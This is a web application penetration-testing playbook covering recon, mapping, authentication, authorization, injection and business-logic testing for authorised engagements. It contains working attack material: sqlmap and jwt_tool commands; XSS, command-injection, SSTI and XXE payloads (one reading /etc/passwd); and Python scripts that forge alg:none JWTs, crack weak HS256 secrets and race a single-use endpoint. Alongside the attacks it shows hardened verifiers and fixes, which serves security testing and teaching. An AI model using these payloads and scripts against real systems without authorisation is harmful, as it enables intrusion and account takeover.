Playbook: Web Application Penetration Test
Scope: Single web application (defined URL/domain); black-box or grey-box
Prerequisites: Scope agreement; Burp Suite Pro; target URL; credentials for grey-box
MITRE Coverage: T1190, T1059.007, T1552, T1078
Objective
Identify and exploit vulnerabilities in the target web application, demonstrating business impact.
Steps
Phase 1: Passive Reconnaissance
- Identify tech stack: Wappalyzer, response headers, cookies, error messages.
- Collect historical URLs:
```bash
gau target.com | tee urls.txt
waybackurls target.com | tee -a urls.txt
```
- Review JS files for endpoints, API keys, hardcoded secrets.
- Google dork: `site:target.com filetype:pdf`, `site:target.com inurl:admin`.
- Check `robots.txt`, `sitemap.xml`, `.well-known/`.
- Certificate transparency (`%25.` is the URL-encoded wildcard, so subdomains are included):
```bash
curl -s "https://crt.sh/?q=%25.target.com&output=json" | jq -r '.[].name_value' | sort -u
```
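The "review JS files for endpoints, API keys, hardcoded secrets" step above is usually done with a handful of regexes over the downloaded bundles. The script below is an added example (not part of the original playbook or any tool it names): it runs a small pattern set over a constructed, fictitious JS snippet and groups the hits by category. The patterns, the `JS_SAMPLE` text and every key and token in it are made up for the demo; tune the patterns to the target's framework before relying on them.

```python
import re

# Constructed sample of a front-end bundle (not from any real target): the
# kind of content found when reviewing a target's JS files in Phase 1.
JS_SAMPLE = r'''
const API_BASE = "/api/v2";
async function me() { return fetch("/api/v2/users/me", { credentials: "include" }); }
function placeOrder(body) { return axios.post("/api/v2/orders", body); }
const GQL = "/graphql";
const cfg = { apiKey: "k9fJ3x82ZqLmP0wTvH4a", awsKey: "AKIAIOSFODNN7EXAMPLE" };
var token = "eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiIxMDAxIn0.dGVzdA";
'''

# Illustrative patterns, not an exhaustive secret-detection ruleset.
PATTERNS = {
    # Quoted string literals that look like in-app routes or API paths.
    "endpoint": re.compile(r"""["'`](/(?:api|v\d+|graphql)[A-Za-z0-9_./{}-]*)["'`]"""),
    # AWS access key IDs: "AKIA" followed by 16 uppercase alphanumerics.
    "aws_access_key": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    # JSON Web Tokens: base64url header starting with "eyJ", two dot separators.
    "jwt": re.compile(r"\beyJ[A-Za-z0-9_-]+\.[A-Za-z0-9_-]+\.[A-Za-z0-9_-]*"),
    # key/value assignments with a secret-looking name and a long quoted value.
    "generic_secret": re.compile(
        r"""(?i)\b(api[_-]?key|secret|token|password)\b\s*[:=]\s*["']([^"']{8,})["']"""
    ),
}


def extract(js: str) -> dict:
    """Return {category: sorted unique hits} for the patterns above."""
    found = {name: set() for name in PATTERNS}
    for name, pattern in PATTERNS.items():
        for m in pattern.finditer(js):
            if name == "generic_secret":
                found[name].add(f"{m.group(1)}={m.group(2)}")   # name=value
            elif name == "endpoint":
                found[name].add(m.group(1))                     # path without quotes
            else:
                found[name].add(m.group(0))
    return {name: sorted(hits) for name, hits in found.items()}


if __name__ == "__main__":
    for category, hits in extract(JS_SAMPLE).items():
        for hit in hits:
            print(f"[{category}] {hit}")
```

Feed it the real bundles with `extract(open(path).read())` after pulling them from `urls.txt`; anything in `aws_access_key` or `jwt` goes straight into the findings, and `generic_secret` hits need a manual look because the name-based match also catches harmless config values.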
Phase 2: Active Mapping
- Spider with Burp:
  - Target → Scan → Crawl and audit (configure scope first).
  - Or: browse manually while logged in so the site map captures authenticated endpoints.
- Directory brute-force:
```bash
feroxbuster -u https://target.com -w /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt -x php,asp,aspx,jsp,html -o fuzz.txt
ffuf -u https://target.com/FUZZ -w /usr/share/seclists/Discovery/Web-Content/common.txt
```
- Parameter discovery:
```bash
# Param Miner (Burp extension): discover hidden parameters
# arjun: standalone parameter brute-forcer
arjun -u https://target.com/api/endpoint
```
- API enumeration: check `/api/`, `/v1/`, `/swagger.json`, `/api-docs`, `/openapi.yaml`.
Phase 3: Authentication Testing
- Default credentials (admin:admin, admin:password, etc.).
- Account enumeration: compare responses (status code, body length, timing) for valid vs. invalid usernames.
- Password policy testing: minimum length, lockout threshold.
- Password reset flow: predictable tokens, token reuse, host header injection.
- MFA bypass: skip step, OTP reuse, response manipulation (`"success":false` → `"success":true`).
- JWT (if used):
```bash
jwt_tool <token>                       # decode header and claims
jwt_tool <token> -X a                  # alg:none exploit
jwt_tool <token> -C -d rockyou.txt     # weak HS256 secret
jwt_tool -t https://target.com/api/endpoint -rh "Authorization: Bearer <token>" -M pb   # playbook scan
# Also check: kid injection, jku/x5u header injection
```
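Two of the JWT checks above (alg:none and a weak HS256 secret) are easy to reproduce by hand, and seeing the verifier's side makes clear why they work. The block below is an added example written for this playbook, not code from jwt_tool or from any target: it builds a token signed with a deliberately weak secret (`SERVER_SECRET`, `ORIGINAL` and `WORDLIST` are constructed), forges an alg:none variant with `role` set to `admin`, recovers the secret offline from a tiny wordlist, and shows a verifier that trusts the header `alg` next to one that pins the algorithm server-side.

```python
import base64
import hashlib
import hmac
import json


def b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def unb64url(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def encode_part(obj: dict) -> str:
    return b64url(json.dumps(obj, separators=(",", ":")).encode())


def sign_hs256(payload: dict, secret: bytes) -> str:
    header = {"alg": "HS256", "typ": "JWT"}
    signing_input = f"{encode_part(header)}.{encode_part(payload)}"
    sig = hmac.new(secret, signing_input.encode(), hashlib.sha256).digest()
    return f"{signing_input}.{b64url(sig)}"


def split_token(token: str):
    h, p, s = token.split(".")
    return json.loads(unb64url(h)), json.loads(unb64url(p)), unb64url(s)


def forge_alg_none(token: str, **new_claims) -> str:
    """Rewrite the header alg to none, tamper the claims, drop the signature."""
    header, payload, _ = split_token(token)
    header["alg"] = "none"
    payload.update(new_claims)
    return f"{encode_part(header)}.{encode_part(payload)}."


def crack_hs256(token: str, wordlist):
    """Offline dictionary attack: re-sign with each candidate and compare."""
    header, _, sig = split_token(token)
    if header.get("alg") != "HS256":
        return None
    signing_input = token.rsplit(".", 1)[0].encode()
    for candidate in wordlist:
        guess = hmac.new(candidate.encode(), signing_input, hashlib.sha256).digest()
        if hmac.compare_digest(guess, sig):
            return candidate
    return None


def verify_trusting_header(token: str, secret: bytes):
    """Vulnerable verifier: honours whatever alg the token's header claims."""
    header, payload, sig = split_token(token)
    signing_input = token.rsplit(".", 1)[0].encode()
    if header.get("alg") == "none":
        return payload if sig == b"" else None
    if header.get("alg") == "HS256":
        expected = hmac.new(secret, signing_input, hashlib.sha256).digest()
        return payload if hmac.compare_digest(expected, sig) else None
    return None


def verify_hs256_only(token: str, secret: bytes):
    """Hardened verifier: the algorithm is pinned server-side, never read from the token."""
    header, payload, sig = split_token(token)
    if header.get("alg") != "HS256":
        return None
    signing_input = token.rsplit(".", 1)[0].encode()
    expected = hmac.new(secret, signing_input, hashlib.sha256).digest()
    return payload if hmac.compare_digest(expected, sig) else None


# Constructed: a token as the application might issue it, signed with a weak secret.
SERVER_SECRET = b"secret123"
ORIGINAL = sign_hs256({"sub": "1001", "role": "user"}, SERVER_SECRET)
WORDLIST = ["password", "changeme", "secret", "secret123", "letmein"]

if __name__ == "__main__":
    forged = forge_alg_none(ORIGINAL, role="admin")
    print("alg:none, trusting verifier:", verify_trusting_header(forged, SERVER_SECRET))
    print("alg:none, pinned verifier:  ", verify_hs256_only(forged, SERVER_SECRET))
    secret = crack_hs256(ORIGINAL, WORDLIST)
    print("cracked secret:", secret)
    resigned = sign_hs256({"sub": "1001", "role": "admin"}, secret.encode())
    print("re-signed admin token verifies:", verify_hs256_only(resigned, SERVER_SECRET) is not None)
```

Against a real target, paste the captured token into `forge_alg_none` and replay it in the same request; if the application accepts it, the finding is the trusting-verifier pattern, not the token format. A cracked secret is the more severe result because it lets you mint tokens that the hardened verifier also accepts.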
Phase 4: Authorization Testing
- Create two accounts at the same privilege level (A, B).
- Create one admin account.
- Test IDOR: capture user A's request, change the ID to user B's resource, and check whether access is granted.
- Test privilege escalation: access admin endpoints as a regular user.
- Test HTTP method switching: `GET /admin` → `POST /admin`, `PUT /admin`.
- Check for BOLA/BFLA in API endpoints (OWASP API Security Top 10).
Phase 5: Injection Testing
- SQLi, every parameter:
```bash
# Manual probes: '   "   \   ') -- -
# Automated:
sqlmap -u "https://target.com/page?id=1" --dbs --batch
sqlmap -r request.txt --level=3 --risk=2 --batch
```
- XSS, every reflected parameter:
```html
<script>alert(document.domain)</script>
<img src=x onerror=alert(1)>
"><svg onload=alert(1)>
```
- Command injection: `; id`, `| id`, `` `id` ``, `$(id)`, `%0aid`.
- SSTI: `{{7*7}}`, `${7*7}`, `<%= 7*7 %>`; look for `49` in the response.
- XXE (XML inputs):
```xml
<?xml version="1.0"?><!DOCTYPE test [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><test>&xxe;</test>
```
- SSRF: submit URLs in parameters and check for internal service responses. Use Collaborator for blind SSRF.
Phase 6: Business Logic
- Price manipulation: tamper with quantity/price in purchase requests.
- Workflow skip: jump directly to later step in multi-step process.
- Race conditions: parallel requests for one-time-use resources.
- File upload: upload `.php`, `.aspx`, `.jsp`; bypass extension checks (case variation such as `.pHp`, double extensions such as `.php.jpg`, mismatched Content-Type).
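The race-condition step is the one most often skipped because it needs parallel requests released at the same instant. The script below is an added example written for this playbook, not code from any tool or target: it hosts a deliberately vulnerable single-use coupon endpoint on localhost (constructed; the `/redeem` path, the `SAVE10` code and the sleep that stands in for a database round trip are all assumptions), then fires ten requests through a barrier so they arrive together and counts how many are accepted. The same server can run a lock-protected variant, which shows what a correct fix looks like and gives the test a baseline of exactly one success.

```python
import threading
import time
import urllib.error
import urllib.request
from concurrent.futures import ThreadPoolExecutor
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer


class CouponHandler(BaseHTTPRequestHandler):
    """Single-use coupon endpoint; server.atomic selects the vulnerable or fixed path."""

    def do_POST(self):
        if self.path != "/redeem":
            self.send_error(404)
            return
        srv = self.server
        if srv.atomic:
            # Fixed: check and mark under one lock (in production a transaction
            # or a conditional UPDATE ... WHERE redeemed = 0).
            with srv.lock:
                ok = not srv.redeemed
                if ok:
                    srv.redeemed = True
        else:
            # Vulnerable: time-of-check to time-of-use gap between read and write.
            ok = not srv.redeemed
            if ok:
                time.sleep(0.2)  # stands in for the DB round trip that widens the window
                srv.redeemed = True
        body = b"redeemed" if ok else b"already used"
        self.send_response(200 if ok else 409)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):  # keep the demo quiet
        pass


def start_server(atomic: bool) -> ThreadingHTTPServer:
    srv = ThreadingHTTPServer(("127.0.0.1", 0), CouponHandler)  # port 0: pick a free one
    srv.atomic = atomic
    srv.redeemed = False
    srv.lock = threading.Lock()
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


def redeem(port: int) -> int:
    """One redemption attempt; returns the HTTP status code."""
    req = urllib.request.Request(
        f"http://127.0.0.1:{port}/redeem", data=b"code=SAVE10", method="POST"
    )
    try:
        with urllib.request.urlopen(req, timeout=10) as resp:
            return resp.status
    except urllib.error.HTTPError as e:
        return e.code


def race(port: int, n: int = 10) -> int:
    """Release n requests simultaneously via a barrier; return how many got 200."""
    barrier = threading.Barrier(n)

    def fire(_):
        barrier.wait()          # every worker blocks here until all n are ready
        return redeem(port)

    with ThreadPoolExecutor(max_workers=n) as pool:
        codes = list(pool.map(fire, range(n)))
    return codes.count(200)


def successes(atomic: bool, n: int = 10) -> int:
    """Spin up a server, run the race against it, tear it down."""
    srv = start_server(atomic)
    try:
        return race(srv.server_address[1], n)
    finally:
        srv.shutdown()
        srv.server_close()


if __name__ == "__main__":
    print("vulnerable endpoint, redemptions accepted:", successes(atomic=False))
    print("fixed endpoint, redemptions accepted:     ", successes(atomic=True))
```

Against a real target, point `redeem` at the captured request (same cookies, same body) and keep the barrier: sending the requests sequentially, even quickly, usually misses the window. More than one 200 for a resource that should be consumed once is the finding; re-run a few times, since a narrow window will not trigger on every attempt.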
Phase 7: Supplementary Automated Scan
```bash
nuclei -u https://target.com -severity critical,high -o nuclei.txt
nikto -h https://target.com -output nikto.txt
```
Cleanup / Deconfliction
- Remove any uploaded test files.
- Delete any test accounts created.
- Report critical findings to client immediately (RCE, SQLi with sensitive data).
Notes & Gotchas
- Burp active scanner complements manual testing but misses logic flaws — don’t rely on it alone.
- API endpoints often have different (weaker) auth than UI — test both.
- GraphQL: introspect the schema (`__schema` query), check for batching attacks, and verify authorization on mutations.
- Test on staging if available; get explicit sign-off before testing production databases.
